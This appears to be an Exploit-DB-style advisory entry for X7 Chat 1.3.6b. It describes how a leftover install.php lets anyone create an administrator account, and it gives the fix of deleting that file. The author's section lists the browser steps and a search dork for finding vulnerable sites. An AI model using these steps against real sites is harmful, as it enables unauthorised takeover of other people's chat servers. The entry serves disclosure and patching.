X7 Chat 1.3.6b Remote Admin Account Creation

vendor:

X7 Chat

by:

d4rk-h4ck3r

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: X7 Chat

Affected Version From: 1.3.6b

Affected Version To: 1.3.6b

Patch Exists: YES

Related CWE: N/A

CPE: a:x7chat:x7_chat:1.3.6b

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

X7 Chat 1.3.6b Remote Admin Account Creation

The vulnerability exists due to insufficient validation of user-supplied input in the 'install.php' script. A remote attacker can create an administrator account on the vulnerable system by accessing the 'install.php' script.

Mitigation:

Delete the file install.php after finishing the online setup.

Source

Exploit-DB raw data:

#####################################################
# [+] Author : d4rk-h4ck3r
# [+] Email : tnst@w.cn
# [+] Site : www.vbspiders.com/vb
# [+] Team : Tunisian Security TeaM
# [+] Dork : powered by x7 chat 1.3.6b
#####################################################

##### Exploit-DB Notes ############
# Vendor has already addressed this issue and even provided a solution in Docs/INSTALL.txt:
# "After finishing the online setup delete the file install.php.  If you do not it will be 
# possible for anyone to create an administrator account on your chat server."
# 
# Therefore please keep in mind this exploit is not guaranteed to work.
#####################################################



The exploit :
1- go http://site.com/script/X7Chat/install.php
2- Now you are in X7 Chat Install step 1 click continue
3- Now you are in X7 Chat Install step 2 click also continue
4- Now you are in X7 Chat Install step 3 .
 change url from http://site.com/script/x7chat/install.php?step=3 to http://site.com/script/x7chat/install.php?step=4
5- now add user name and password
6- Go login page http://site.com/script/X7Chat/index.php

Good luck and don't make something bad .


Greetz to Password & Maxilog .